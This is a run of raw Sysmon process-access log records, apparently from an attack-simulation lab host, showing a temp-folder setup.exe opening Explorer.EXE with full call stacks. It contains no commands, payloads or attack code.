13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows